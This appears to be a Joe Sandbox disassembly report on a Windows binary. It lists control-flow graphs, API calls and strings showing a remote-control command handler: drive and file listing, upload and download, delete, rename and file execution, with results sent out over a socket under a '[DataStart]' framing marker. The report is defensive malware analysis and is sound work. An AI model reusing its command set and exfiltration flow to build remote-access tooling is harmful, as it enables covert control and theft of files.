                              control_flow_graph 774 40bea2-40bf13 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40efb5 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 779 40bff8-40c007 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 774->779 780 40bf19-40bff3 GetLogicalDriveStringsA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 4083e6 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 3 call 402198 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 5 774->780 782 40c044-40c053 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 779->782 783 40c009-40c03f call 401289 call 40ee4b call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40bc9b 779->783 803 40c620-40c63e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 401b3c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 780->803 784 40c055-40c087 call 401289 call 40ee4b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ShellExecuteW 782->784 785 40c08c-40c09b ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 782->785 783->803 814 40c2e0-40c2e6 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 784->814 790 40c102-40c111 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 785->790 791 40c09d-40c0fd call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40ca9b 785->791 794 40c117-40c1f5 call 401289 * 3 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 5 call 4025ef ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z call 40c63f closesocket 790->794 795 40c25a-40c269 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 790->795 791->803 881 40c252 794->881 882 40c1f7-40c24c call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ 794->882 801 40c310-40c31f ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 795->801 802 40c26f-40c2a7 call 401289 call 40ee4b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ GetFileAttributesW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 795->802 809 40c325-40c3b5 call 401289 call 40ee4b call 401289 call 40ee4b ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ * 2 _wrename ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 801->809 810 40c47e-40c48d ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 801->810 841 40c2a9-40c2dd call 401289 call 40ee4b call 40ed73 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40f234 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 802->841 842 40c2eb-40c30e call 401289 call 40ee4b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ DeleteFileW 802->842 877 40c3b7-40c3ec ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40bc9b 809->877 878 40c3ee-40c45e ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z call 402198 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 809->878 820 40c530-40c53f ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 810->820 821 40c493-40c528 call 401289 call 40ee4b call 401289 call 40ee4b ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ CreateDirectoryW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40bc9b 810->821 814->803 827 40c545-40c5ec call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 40ed0c call 40ce9d call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 401289 call 40ee4b call 401289 call 40ee4b call 402c45 call 40ff13 820->827 828 40c5ee-40c5fd ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 820->828 821->820 827->803 828->803 831 40c5ff-40c61f call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 403474 828->831 831->803 841->814 842->814 900 40c464-40c476 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 877->900 878->900 881->795 882->881 900->810
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410858,?,?,76E50440,00415268,6A41AFB0), ref: 0040BEBC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BECB
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040BEEE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040BEF8
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getdrives), ref: 0040BF0D
                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0040BF22
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 0040BF38
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004116FC,00000000,00000002), ref: 0040BF49
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040BF54
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BF63
                                • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,6A41AFB0), ref: 004083F4
                                • Part of subcall function 004083E6: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                                • Part of subcall function 004083E6: GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                                • Part of subcall function 004083E6: _itoa.MSVCRT ref: 0040841C
                                • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                                • Part of subcall function 004083E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                                • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                                • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                                • Part of subcall function 004083E6: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                                • Part of subcall function 004083E6: lstrlenA.KERNEL32(00000000), ref: 00408484
                                • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,driveslist,00415268,?,00415268,00000000), ref: 0040BF8D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040BF9A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040BFA7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFC6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFCF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFDB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFE4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFED
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFB1
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,listfiles), ref: 0040C001
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C031
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C623
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C634
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@V?$basic_string@$V01@@$D@1@@Hstd@@$?length@?$basic_string@V10@0@$??4?$basic_string@??8std@@?c_str@?$basic_string@?find@?$basic_string@DriveV01@V10@V12@$?data@?$basic_string@?resize@?$basic_string@?substr@?$basic_string@LogicalStringsTypeV10@@_itoalstrlen
                              • String ID: Unable to rename file!$delete$download$driveslist$getdrives$listfiles$newfolder$open$open$rename$search$sendfiledata$showmsg$stopsearch$upload
                              • API String ID: 3022309246-3399653838
                              • Opcode ID: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                              • Instruction ID: d8c6c4d787ab652cc050522138cbe33c2e5dc8e9482fe9015d7f3b3e7ca7eb0a
                              • Opcode Fuzzy Hash: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                              • Instruction Fuzzy Hash: 9B225C72900109ABDB04EBE1DD5E9EE7B7CEB44305F10057AF502F20D1EE795A89CBA9
                              Function 00402C45 Relevance: 131.6, APIs: 71, Strings: 4, Instructions: 366filenetworkthreadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 995 402c45-402c90 _EH_prolog ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z socket connect 996 402c96-402d26 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 3 call 402504 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 995->996 997 40314d-403177 _CxxThrowException ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 403474 FindClose ExitThread 995->997 1002 402d43-402db0 ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ call 403646 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ FindFirstFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 996->1002 1003 402d28-402d3e _CxxThrowException 996->1003 1006 402db2-402de9 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 402504 _CxxThrowException 1002->1006 1007 402dee-402e00 FindNextFileW 1002->1007 1003->1002 1006->1007 1009 402e06-402e0d 1007->1009 1010 40306f-40314a FindClose ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 3 call 402504 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 403474 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 1007->1010 1012 402e13-402e2b wcscmp 1009->1012 1013 402ef7-402f60 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ call 403646 ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z 1009->1013 1012->1013 1015 402e31-402e43 wcscmp 1012->1015 1023 402f66-403041 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 40edd3 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 3 call 402504 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 1013->1023 1024 40305e-40306a ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 1013->1024 1015->1013 1018 402e49-402ece ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z * 2 call 403183 1015->1018 1028 402ed0-402ee6 _CxxThrowException 1018->1028 1029 402eeb-402ef1 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 1018->1029 1023->1024 1032 403043-403059 _CxxThrowException 1023->1032 1024->1007 1028->1029 1029->1013 1032->1024
                              APIs
                              • _EH_prolog.MSVCRT ref: 00402C4A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,6A41AFB0,6A41AFB0), ref: 00402C67
                              • socket.WS2_32(00000000,00000001,00000006), ref: 00402C7A
                              • connect.WS2_32(00000000,00415278,00000010), ref: 00402C89
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchstarted,00415268,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CB8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CC8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CD8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CE2
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D06
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D12
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D1E
                              • _CxxThrowException.MSVCRT(00000001,00411A80), ref: 00402D3E
